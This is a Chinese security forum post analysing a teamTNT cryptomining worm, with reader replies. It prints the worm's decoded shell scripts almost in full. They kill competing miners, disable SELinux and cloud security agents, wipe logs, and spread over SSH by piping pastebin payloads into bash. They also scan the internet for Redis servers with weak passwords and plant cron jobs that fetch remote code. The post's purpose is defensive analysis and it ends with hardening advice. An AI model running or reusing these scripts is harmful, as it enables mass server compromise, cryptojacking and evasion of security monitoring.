ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 %
netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
pgrep -f monerohash | xargs -I % kill -9 %
pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %
pgrep -f xzpauectgr | xargs -I % kill -9 %
pgrep -f slxfbkmxtd | xargs -I % kill -9 %
pgrep -f mixtape | xargs -I % kill -9 %
pgrep -f addnj | xargs -I % kill -9 %
pgrep -f 200.68.17.196 | xargs -I % kill -9 %
pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 %
pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 %
pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 %
pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 %
pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 %
pgrep -f honvbsasbf.conf | xargs -I % kill -9 %
pgrep -f mqdsflm.cf | xargs -I % kill -9 %
pgrep -f stratum | xargs -I % kill -9 %
pgrep -f lower.sh | xargs -I % kill -9 %
pgrep -f ./ppp | xargs -I % kill -9 %
pgrep -f cryptonight | xargs -I % kill -9 %
pgrep -f ./seervceaess | xargs -I % kill -9 %
pgrep -f ./servceaess | xargs -I % kill -9 %
pgrep -f ./servceas | xargs -I % kill -9 %
pgrep -f ./servcesa | xargs -I % kill -9 %
pgrep -f ./vsp | xargs -I % kill -9 %
pgrep -f ./jvs | xargs -I % kill -9 %
pgrep -f ./pvv | xargs -I % kill -9 %
pgrep -f ./vpp | xargs -I % kill -9 %
pgrep -f ./pces | xargs -I % kill -9 %
pgrep -f ./rspce | xargs -I % kill -9 %
pgrep -f ./haveged | xargs -I % kill -9 %
pgrep -f ./jiba | xargs -I % kill -9 %
pgrep -f ./watchbog | xargs -I % kill -9 %
pgrep -f ./A7mA5gb | xargs -I % kill -9 %
pgrep -f kacpi_svc | xargs -I % kill -9 %
pgrep -f kswap_svc | xargs -I % kill -9 %
pgrep -f kauditd_svc | xargs -I % kill -9 %
pgrep -f kpsmoused_svc | xargs -I % kill -9 %
pgrep -f kseriod_svc | xargs -I % kill -9 %
pgrep -f kthreadd_svc | xargs -I % kill -9 %
pgrep -f ksoftirqd_svc | xargs -I % kill -9 %
pgrep -f kintegrityd_svc | xargs -I % kill -9 %
pgrep -f jawa | xargs -I % kill -9 %
pgrep -f oracle.jpg | xargs -I % kill -9 %
pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 %
pgrep -f 188.209.49.54 | xargs -I % kill -9 %
pgrep -f 181.214.87.241 | xargs -I % kill -9 %
pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 %
pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 %
pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 %
pgrep -f servim | xargs -I % kill -9 %
pgrep -f kblockd_svc | xargs -I % kill -9 %
pgrep -f native_svc | xargs -I % kill -9 %
pgrep -f ynn | xargs -I % kill -9 %
pgrep -f 65ccEJ7 | xargs -I % kill -9 %
pgrep -f jmxx | xargs -I % kill -9 %
pgrep -f 2Ne80nA | xargs -I % kill -9 %
pgrep -f sysstats | xargs -I % kill -9 %
pgrep -f systemxlv | xargs -I % kill -9 %
pgrep -f watchbog | xargs -I % kill -9 %
pgrep -f OIcJi1m | xargs -I % kill -9 %
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f XJnRj
pkill -f mgwsl
pkill -f pythno
pkill -f jweri
pkill -f lx26
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f polkitd
pkill -f nanoWatch
pkill -f zigw
pkill -f devtool
pkill -f devtools
pkill -f systemctI
pkill -f watchbog
pkill -f cryptonight
pkill -f sustes
pkill -f xmrig
pkill -f xmrig-cpu
pkill -f 121.42.151.137
pkill -f init12.cfg
pkill -f nginxk
pkill -f tmp/wc.conf
pkill -f xmrig-notls
pkill -f xmr-stak
pkill -f suppoie
pkill -f zer0day.ru
pkill -f dbus-daemon--system
pkill -f nullcrew
pkill -f systemctI
pkill -f kworkerds
pkill -f init10.cfg
pkill -f /wl.conf
pkill -f crond64
pkill -f sustse
pkill -f vmlinuz
pkill -f exin
pkill -f apachiii
pkill -f networkservics
rm -rf /usr/bin/config.json
rm -rf /usr/bin/exin
rm -rf /tmp/wc.conf
rm -rf /tmp/log_rot
rm -rf /tmp/apachiii
rm -rf /tmp/sustse
rm -rf /tmp/php
rm -rf /tmp/p2.conf
rm -rf /tmp/pprt
rm -rf /tmp/ppol
rm -rf /tmp/javax/config.sh
rm -rf /tmp/javax/sshd2
rm -rf /tmp/.profile
rm -rf /tmp/1.so
rm -rf /tmp/kworkerds
rm -rf /tmp/kworkerds3
rm -rf /tmp/kworkerdssx
rm -rf /tmp/xd.json
rm -rf /tmp/syslogd
rm -rf /tmp/syslogdb
rm -rf /tmp/65ccEJ7
rm -rf /tmp/jmxx
rm -rf /tmp/2Ne80nA
rm -rf /tmp/dl
rm -rf /tmp/ddg
rm -rf /tmp/systemxlv
rm -rf /tmp/systemctI
rm -rf /tmp/.abc
rm -rf /tmp/osw.hb
rm -rf /tmp/.tmpleve
rm -rf /tmp/.tmpnewzz
rm -rf /tmp/.java
rm -rf /tmp/.omed
rm -rf /tmp/.tmpc
rm -rf /tmp/.tmpleve
rm -rf /tmp/.tmpnewzz
rm -rf /tmp/gates.lod
rm -rf /tmp/conf.n
rm -rf /tmp/devtool
rm -rf /tmp/devtools
rm -rf /tmp/fs
rm -rf /tmp/.rod
rm -rf /tmp/.rod.tgz
rm -rf /tmp/.rod.tgz.1
rm -rf /tmp/.rod.tgz.2
rm -rf /tmp/.mer
rm -rf /tmp/.mer.tgz
rm -rf /tmp/.mer.tgz.1
rm -rf /tmp/.hod
rm -rf /tmp/.hod.tgz
rm -rf /tmp/.hod.tgz.1
rm -rf /tmp/84Onmce
rm -rf /tmp/C4iLM4L
rm -rf /tmp/lilpip
rm -rf /tmp/3lmigMo
rm -rf /tmp/am8jmBP
rm -rf /tmp/tmp.txt
rm -rf /tmp/baby
rm -rf /tmp/.lib
rm -rf /tmp/systemd
rm -rf /tmp/lib.tar.gz
rm -rf /tmp/baby
rm -rf /tmp/java
rm -rf /tmp/j2.conf
rm -rf /tmp/.mynews1234
rm -rf /tmp/a3e12d
rm -rf /tmp/.pt
rm -rf /tmp/.pt.tgz
rm -rf /tmp/.pt.tgz.1
rm -rf /tmp/go
rm -rf /tmp/java
rm -rf /tmp/j2.conf
rm -rf /tmp/.tmpnewasss
rm -rf /tmp/java
rm -rf /tmp/go.sh
rm -rf /tmp/go2.sh
rm -rf /tmp/khugepageds
rm -rf /tmp/.censusqqqqqqqqq
rm -rf /tmp/.kerberods
rm -rf /tmp/kerberods
rm -rf /tmp/seasame
rm -rf /tmp/touch
rm -rf /tmp/.p
rm -rf /tmp/runtime2.sh
rm -rf /tmp/runtime.sh
rm -rf /dev/shm/z3.sh
rm -rf /dev/shm/z2.sh
rm -rf /dev/shm/.scr
rm -rf /dev/shm/.kerberods
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libioset.so
chattr -i /etc/ld.so.preload
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libioset.so
rm -rf /tmp/watchdogs
rm -rf /etc/cron.d/tomcat
rm -rf /etc/rc.d/init.d/watchdogs
rm -rf /usr/sbin/watchdogs
rm -f /tmp/kthrotlds
rm -f /etc/rc.d/init.d/kthrotlds
rm -rf /tmp/.sysbabyuuuuu12
rm -rf /tmp/logo9.jpg
rm -rf /tmp/miner.sh
rm -rf /tmp/nullcrew
rm -rf /tmp/proc
rm -rf /tmp/2.sh
rm /opt/atlassian/confluence/bin/1.sh
rm /opt/atlassian/confluence/bin/1.sh.1
rm /opt/atlassian/confluence/bin/1.sh.2
rm /opt/atlassian/confluence/bin/1.sh.3
rm /opt/atlassian/confluence/bin/3.sh
rm /opt/atlassian/confluence/bin/3.sh.1
rm /opt/atlassian/confluence/bin/3.sh.2
rm /opt/atlassian/confluence/bin/3.sh.3
rm -rf /var/tmp/f41
rm -rf /var/tmp/2.sh
rm -rf /var/tmp/config.json
rm -rf /var/tmp/xmrig
rm -rf /var/tmp/1.so
rm -rf /var/tmp/kworkerds3
rm -rf /var/tmp/kworkerdssx
rm -rf /var/tmp/kworkerds
rm -rf /var/tmp/wc.conf
rm -rf /var/tmp/nadezhda.
rm -rf /var/tmp/nadezhda.arm
rm -rf /var/tmp/nadezhda.arm.1
rm -rf /var/tmp/nadezhda.arm.2
rm -rf /var/tmp/nadezhda.x86_64
rm -rf /var/tmp/nadezhda.x86_64.1
rm -rf /var/tmp/nadezhda.x86_64.2
rm -rf /var/tmp/sustse3
rm -rf /var/tmp/sustse
rm -rf /var/tmp/moneroocean/
rm -rf /var/tmp/devtool
rm -rf /var/tmp/devtools
rm -rf /var/tmp/play.sh
rm -rf /var/tmp/systemctI
rm -rf /var/tmp/.java
rm -rf /var/tmp/1.sh
rm -rf /var/tmp/conf.n
rm -r /var/tmp/lib
rm -r /var/tmp/.lib
chattr -iau /tmp/lok
chmod 700 /tmp/lok
rm -rf /tmp/lok
sleep 1
chattr -i /tmp/kdevtmpfsi
echo 1 > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi
sleep 1
chattr -i /tmp/redis2
echo 1 > /tmp/redis2
chattr +i /tmp/redis2
sleep 1
chattr -i /usr/lib/systemd/systemd-update-daily
echo 1 > /usr/lib/systemd/systemd-update-daily
chattr +i /usr/lib/systemd/systemd-update-daily
#yum install -y docker.io || apt-get install docker.io;
docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "monero" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %
docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
}

##  注意这个函数有可能结束JavaUpdates
kill_sus_proc()
{
    ps axf -o "pid"|while read procid
    do
            ls -l /proc/$procid/exe | grep /tmp
            if [ $? -ne 1 ]
            then
                    cat /proc/$procid/cmdline| grep -a -E "JavaUpdates"
                    if [ $? -ne 0 ]
                    then
                            kill -9 $procid
                    else
                            echo "don't kill"
                    fi
            fi
    done
    ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
    do
            cat /proc/$procid/cmdline| grep -a -E "JavaUpdates"
            if [ $? -ne 0 ]
            then
                    kill -9 $procid
            else
                    echo "don't kill"
            fi
    done
}

    if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/UhUmR517||wget -q -O - https://pastebin.com/raw/UhUmR517)|base64 -d|bash >/dev/null 2>&1 &' & done # https://documents.hubaoquan.cn/UhUmR517.txt
fi

    kill_miner_proc
    kill_sus_proc

function upgradeday() {
    if [ "$me" != "root" ];then
        bug_path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/"
    else
        bug_path="/bin/"
    fi
    if [ -f "$bug_path/JavaUpdates" ]; then
        cd $bug_path        
        $check_type=$(./JavaUpdates -V|grep 'xmr-stak'|wc -l)
        if [ ${check_type} -ne 0 ];then
            $check_type_b=$(./JavaUpdates -V|grep '1.0.4-rx'|wc -l)
            if [ ${check_type_b} -eq 0 ];then
                cleanoldpack
            fi
        else
            $check_type_a=$(./JavaUpdates -V|grep 'XMRig'|wc -l)
            if [ ${check_type_a} -ne 0 ];then
                $check_type_b=$(./JavaUpdates -V|grep '5.3.0'|wc -l)
                if [ ${check_type_b} -eq 0 ];then
                    cleanoldpack
                fi
            else
                cleanoldpack
            fi
        fi
    else
        cleanoldpack
    fi
}
if [ "$me" != "root" ];then
    pz=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l)
    if [ ${pz} -ne 0 ];then
        crontab -r
        cronlow
    else
        download
        crontab -r
        cronlow
        sleep 15
        pm=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l)
        if [ ${pm} -eq 0 ];then
            testa
        fi
        prt=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l)
        if [ ${prt} -ne 0 ];then
            if [ ! -f "/tmp/.tmpc" ]; then
                finished "$deep"
            fi
        fi
    fi
else
    pz=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l)
    if [ ${pz} -ne 0 ];then
        system
        cronhigh
    else
        system
        cronhigh
        download
        sleep 15
        pm=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l)
        if [ ${pm} -ne 0 ];then
            if [ ! -f "/tmp/.tmpc" ]; then
                finished "$surf"
            fi
        fi
        sleep 30
        if [ ${pm} -eq 0 ];then
            testa
            if [ ${pm} -ne 0 ];then
                finished "$surf"
            fi
        fi
        if [ ${pm} -eq 0 ];then
            download
            if [ ${pm} -ne 0 ];then
                finished "$deep"
            fi
        fi
        if [ ${pm} -eq 0 ];then
            testa
            if [ ${pm} -ne 0 ];then
                finished "$deep"
            fi
        fi
    fi
    echo 0>/var/log/secure
    echo 0>/var/log/cron
    sed -i '/pastebin/d' /var/log/syslog
    sed -i '/github/d' /var/log/syslog
fi
#
cronbackup
#
cronrc
#
    px=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l)
    if [ ${px} -gt 1 ];then
    ps auxf|grep -v grep|grep "JavaUpdates" | awk '{print $2}'|xargs kill -9
    fi
    if [ `whoami` = "root" ];then
    (curl -fsSL https://pastebin.com/raw/HS6SqV7w||wget -q -O - https://pastebin.com/raw/HS6SqV7w)|base64 -d|bash  #https://documents.hubaoquan.cn/HS6SqV7w.txt
    fi
#

注意最后几行，如果root用户登录会执行这个脚本https://pastebin.com/raw/HS6SqV7w,若资源失效我已上传至：https://documents.hubaoquan.cn/HS6SqV7w.txt

HS6SqV7w.txt解码后,#号后边是我的注释。

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
sleep $( seq 3 7 | sort -R | head -n1 )
cd /tmp || cd /var/tmp
sleep 1
mkdir -p .ice-unix/... && chmod -R 777 .ice-unix && cd .ice-unix/...
sleep 1
if [ -f .watch ]; then
rm -rf .watch
exit 0
fi
sleep 1
echo 1 > .watch
sleep 1
ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null
ps x | awk '!/awk/ && /barad_agent|masscan|\.sr0|clay|udevs|\.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null
sleep 1
if [ -x "$(command -v apt-get)" ]; then
export DEBIAN_FRONTEND=noninteractive
apt-get update -y
apt-get install -y debconf-doc
apt-get install -y build-essential
apt-get install -y libpcap0.8-dev libpcap0.8
apt-get install -y libpcap*
apt-get install -y make gcc git
apt-get install -y redis-server
apt-get install -y redis-tools
apt-get install -y redis
apt-get install -y iptables
#apt-get install -y wget curl
apt-get install -y unhide
fi
if [ -x "$(command -v yum)" ]; then
yum update -y
yum install -y epel-release
yum update -y
yum install -y git iptables make gcc redis libpcap libpcap-devel
yum install -y wget curl
yum install -y unhide
fi
sleep 1
echo "Software Installed"

dddir="/usr/sbin/unhide"
$dddir quick |grep PID:|awk '{print $4}'|xargs -I % kill -9 % 2>/dev/null
chattr -i /usr/bin/ip6network
chattr -i /usr/bin/kswaped
chattr -i /usr/bin/irqbalanced
chattr -i /usr/bin/rctlcli
chattr -i /usr/bin/systemd-network
chattr -i /usr/bin/pamdicks
echo 1 > /usr/bin/ip6network
echo 2 > /usr/bin/kswaped
echo 3 > /usr/bin/irqbalanced
echo 4 > /usr/bin/rctlcli
echo 5 > /usr/bin/systemd-network
echo 6 > /usr/bin/pamdicks
chattr +i /usr/bin/ip6network
chattr +i /usr/bin/kswaped
chattr +i /usr/bin/irqbalanced
chattr +i /usr/bin/rctlcli
chattr +i /usr/bin/systemd-network
chattr +i /usr/bin/pamdicks

if ps aux | grep -i '[a]liyun'; then
curl -fsSL http://update.aegis.aliyun.com/download/uninstall.sh | bash  # https://documents.hubaoquan.cn/uninstall.sh
curl -fsSL http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash # https://documents.hubaoquan.cn/quartz_uninstall.sh
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo "DER Uninstalled"
if ! [ -x "$(command -v masscan)" ]; then
rm -rf /var/lib/apt/lists/*
rm -rf x1.tar.gz
sleep 1
curl -sL -o x1.tar.gz http://teamtnt.red/franz/b0cdc46f1337a7ed1bc4b27f08709d31/1.0.4.tar.gz # 访问不了无法下载这个压缩包 
#其实就是下载teamTNT团队的木马 ，teamTNT团队具体请看 https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/   http://vulsee.com/archives/vulsee_2020/0804_11815.html
sleep 1
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
echo "Masscan Installed"
fi
echo "Masscan Already Installed"
sleep 3 && rm -rf .watch
if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
curl -kLs ftp://ftp.lysator.liu.se/pub/unix/pnscan/pnscan-1.11.tar.gz > .x112 || wget -q -O .x112 ftp://ftp.lysator.liu.se/pub/unix/pnscan/pnscan-1.11.tar.gz # https://documents.hubaoquan.cn/pnscan-1.11.tar.gz #一个扫描工具
sleep 1
[ -f .x112 ] && tar xf .x112&& cd pnscan-1.11 && make lnx && make install&& cd .. && rm -rf pnscan-1.11 .x112
echo "Pnscan Installed"
fi
echo "Pnscan Already Installed"

(curl -fsSL https://pastebin.com/raw/7vyUJDyv||wget -q -O - https://pastebin.com/raw/7vyUJDyv)|base64 -d|bash &>/dev/null & #https://documents.hubaoquan.cn/7vyUJDyv.txt

7vyUJDyv.txt解码后这个应该是扫描开放6379端口的脚本

#!/bin/bash 
SHELL=/bin/sh 
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
sleep 1
ps -fe|grep pnscan |grep -v grep
if [ $? -ne 0 ]
then
    rm -rf .dat .shard .ranges .lan 2>/dev/null
    sleep 1
    echo 'config set dbfilename "backup.db"' > .dat
    echo 'save' >> .dat
    echo 'flushall' >> .dat
    echo 'set backup1 "\n\n\n*/2 * * * * curl -fsSL https://pastebin.com/raw/1eDKHr4r | sh\n\n"' >> .dat #https://documents.hubaoquan.cn/1eDKHr4r.txt
    echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- https://pastebin.com/raw/1eDKHr4r | sh\n\n"' >> .dat
    echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL https://pastebin.com/raw/1eDKHr4r | sh\n\n"' >> .dat
    echo 'set backup4 "\n\n\n*/5 * * * * wget -q -O- https://pastebin.com/raw/1eDKHr4r | sh\n\n"' >> .dat
    echo 'config set dir "/var/spool/cron/"' >> .dat
    echo 'config set dbfilename "root"' >> .dat
    echo 'save' >> .dat
    echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
    echo 'save' >> .dat
    sleep 1
    pnx=pnscan
    [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
    [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
    for x in $( seq 1 224 | sort -R ); do
    for y in $( seq 0 255 | sort -R ); do
    $pnx -t512 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
    awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw &
    cat .dat | redis-cli -h $h -p $p -a redis --raw &
    cat .dat | redis-cli -h $h -p $p -a root --raw &
    cat .dat | redis-cli -h $h -p $p -a oracle --raw &
    cat .dat | redis-cli -h $h -p $p -a password --raw &
    cat .dat | redis-cli -h $h -p $p -a p@aaw0rd --raw &
    cat .dat | redis-cli -h $h -p $p -a abc123 --raw &
    cat .dat | redis-cli -h $h -p $p -a abc123! --raw &
    cat .dat | redis-cli -h $h -p $p -a 123456 --raw &
    cat .dat | redis-cli -h $h -p $p -a admin --raw &
    done < .r.$x.$y.l
    done
    done
    sleep 1
    masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
    sleep 1
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a redis --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a root --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a oracle --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a password --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a p@aaw0rd --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a abc123 --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a abc123! --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a 123456 --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a admin --raw 2>/dev/null 1>/dev/null &
    done < .shard
    sleep 1
    masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
    sleep 1
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a redis --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a root --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a oracle --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a password --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a p@aaw0rd --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a abc123 --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a abc123! --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a 123456 --raw 2>/dev/null 1>/dev/null &
    cat .dat | redis-cli -h $h -p $p -a admin --raw 2>/dev/null 1>/dev/null &
    done < .ranges
    sleep 1
    ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
    sleep 1
    masscan --max-rate 10000 -p6379 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
    sleep 1
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
    done < .lan
    sleep 60
    rm -rf .dat .shard .ranges .lan 2>/dev/null
else
    echo "root runing....."
fi

结论

很显然是teamTNT团队的挖矿木马
这个木马运行，需要依赖python和redis。最后交给安全团队去处理了，我对这块毕竟不熟。
如果不需要Python建议直接删除python,修改redis端口和密码,禁止主机访问：https://pastebin.com 和 ftp.lysator.liu.se。
https://www.secpulse.com/archives/140346.html

xiaofengzi · 发表于 2020-10-14 16:45

fengbp 发表于 2020-10-14 15:52
楼主有了解过一个访问外部IP 47.101.30.124端口13531的挖矿木马吗？我们单位几台Win2008服务器好像都中了这 ...

你参考一下里面给的情报源https://x.threatbook.cn/nodev4/ip/47.101.30.124
感觉像是杀软没杀干净，还有永恒之蓝的传播模块遗留，还是那句话，主要还是怎么进来的，赶紧加固服务器，别让更狠的勒索进来。

fengbp · 发表于 2020-10-14 15:52

楼主有了解过一个访问外部IP 47.101.30.124端口13531的挖矿木马吗？我们单位几台Win2008服务器好像都中了这个木马，被华为防火墙入侵防御拦截下来的。但是我用杀毒软件查过几台服务器都没发现木马或病毒或是异常的进程，最后没办法，只能先在防火墙里面把这个IP和端口全部禁掉。

午夜逃跑计划 · 发表于 2020-10-14 09:21

预防：云服务器防火墙限制一下端口访问IP，很香

丶小离 · 发表于 2020-10-14 09:21

厉害..

hxd97244 · 发表于 2020-10-14 09:25

现在一看代码就头大，总是看的一知半解，哎早知道那时候好好的学C++

发飙的熊猫君 · 发表于 2020-10-14 10:02

真正懂技术的都是低调的

MZA1220 · 发表于 2020-10-14 10:17

真正懂技术的都是低调的

Nseries丶 · 发表于 2020-10-14 10:31

厉害了，支持一下

huchhc · 发表于 2020-10-14 11:15

这么多的代码啊。

brucewoo · 发表于 2020-10-14 11:52

精彩的分析。

MFC · 发表于 2020-10-14 14:16

redis配置一定要注意权限控制，之前处理过的一台挖矿服务器也是类似原因被拿下的。不过每次看这些样本代码都能学到不少东西。

帐号		自动登录	找回密码
密码			注册[Register]

[PC样本分析] 分析teamTNT团队Linux挖矿木马执行过程与防范

分析teamTNT团队Linux挖矿木马执行过程与防范

问题排查

木马脚本分析

结论

免费评分

个人中心